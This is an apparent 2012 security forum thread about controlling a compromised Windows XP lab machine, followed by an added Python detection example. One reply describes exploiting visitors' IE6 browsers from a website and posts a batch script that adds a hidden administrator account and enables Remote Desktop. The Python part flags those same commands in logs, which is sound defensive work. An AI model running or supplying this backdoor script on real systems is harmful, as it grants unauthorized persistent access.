tiny42 Posted December 2, 2012

Hello allz, I'm new on the forum and a bit of a noob when it comes to BackTrack. Here is the setup: Using a VM, I have a setup of 2 machines: XP SP3 and BackTrack 5 R3. Using Armitage I gained control of the XP machine, but I was wondering if there is any way to remotely install software on that XP machine.
Pwnd2Pwnr Posted December 2, 2012

Installing software is not really what Armitage is for.
tiny42 Posted December 3, 2012 (Author)

English is not my first language, so I may not have raised my point clearly enough. Using Armitage I could launch a command prompt and see documents and such, but I was wondering if there is a solution like remote desktop or something, not necessarily using Armitage, but other tools. Let's say that on the XP machine there is a software running and I want to remotely control that software. I can gain access to the XP machine, but how can I control that software...
digip Posted December 3, 2012 (edited)

If you compromised the machine and escalated yourself to admin, you could most certainly install anything you wanted for the most part. Some GUI programs even have command line switches to run them silently and accept all EULAs, for example. As for controlling software, you could also enable RDP via the command line or run a reverse VNC install and just remote in over the GUI as well, as if you were sitting at the machine, and do whatever you wanted that way too. Pretty much anything is possible if you've gained elevated privileges.

I used to have a bat script I set up for turning on RDP and adding another user to the system. I used to keep it on one of my sites back in the day, that would exploit Internet Explorer, in the event they tried to attack my site and got the error page, it would detect if they had IE6 and run the ActiveX exploit, then make them run the bat file which enabled RDP and added an admin user for me, so long as they were logged on with admin privileges, which most Windows XP users were back then, always the admin, and not smart enough to set up limited user accounts for web surfing from home.

edit: had to find the bat script. Not sure if this even works still.

[CODE]
@echo off
REM Create a local account and add it to the Administrators group
net user stupid password /add && net localgroup Administrators stupid /add
REM Set the Terminal Services service to start automatically, then start it
SC config "TermService" start= "auto"
NET START "Terminal Services"
REM Allow incoming Remote Desktop connections
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F
@echo on
echo Success!
[/CODE]

Edited December 3, 2012 by digip
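Seen from the defending side, the batch file in digip's post leaves three distinct command lines in process-creation logging. The following Python check is an added example, not part of the original thread: it flags a host where a local account is created, added to Administrators, and RDP is enabled within a short window. The event tuples, host names and the five-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Command-line patterns for the three changes the batch file makes.
RULES = {
    "local_user_added": re.compile(r'\bnet1?(\.exe)?\s+user\s+\S+.*\s/add\b', re.I),
    "admin_group_add": re.compile(r'\bnet1?(\.exe)?\s+localgroup\s+"?administrators"?\s+.*/add\b', re.I),
    "rdp_enabled": re.compile(r'\breg(\.exe)?\s+add\s+.*terminal server.*fDenyTSConnections.*/d\s+0\b', re.I),
}

def find_backdoor_sequences(events, window=timedelta(minutes=5)):
    """Return {host: sorted rule names} for hosts where every rule fires within `window`."""
    hits = {}
    for ts, host, cmdline in events:
        for name, rx in RULES.items():
            if rx.search(cmdline):
                hits.setdefault(host, []).append((datetime.fromisoformat(ts), name))
    flagged = {}
    for host, found in hits.items():
        found.sort()
        # Slide over the hits: does any starting point see all rules inside the window?
        for i, (start, _) in enumerate(found):
            names = {n for t, n in found[i:] if t - start <= window}
            if names == set(RULES):
                flagged[host] = sorted(names)
                break
    return flagged

# Constructed process-creation records: (timestamp, host, command line).
SAMPLE_EVENTS = [
    ("2012-12-03T10:00:01", "XP-LAB", "net user stupid password /add"),
    ("2012-12-03T10:00:01", "XP-LAB", "net localgroup Administrators stupid /add"),
    ("2012-12-03T10:00:02", "XP-LAB", 'SC config "TermService" start= "auto"'),
    ("2012-12-03T10:00:03", "XP-LAB",
     r'REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"'
     r' /v fDenyTSConnections /t REG_DWORD /d 0 /F'),
    # Benign look-alikes: listing users, and turning RDP off (/d 1).
    ("2012-12-03T11:30:00", "HELPDESK-1", "net user"),
    ("2012-12-03T11:31:00", "HELPDESK-1",
     r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
     r' /v fDenyTSConnections /t REG_DWORD /d 1 /f'),
]

if __name__ == "__main__":
    for host, rules in find_backdoor_sequences(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(rules)}")
```

Requiring all three changes on one host inside the window keeps routine single actions, such as an administrator enabling RDP alone, from raising the alert.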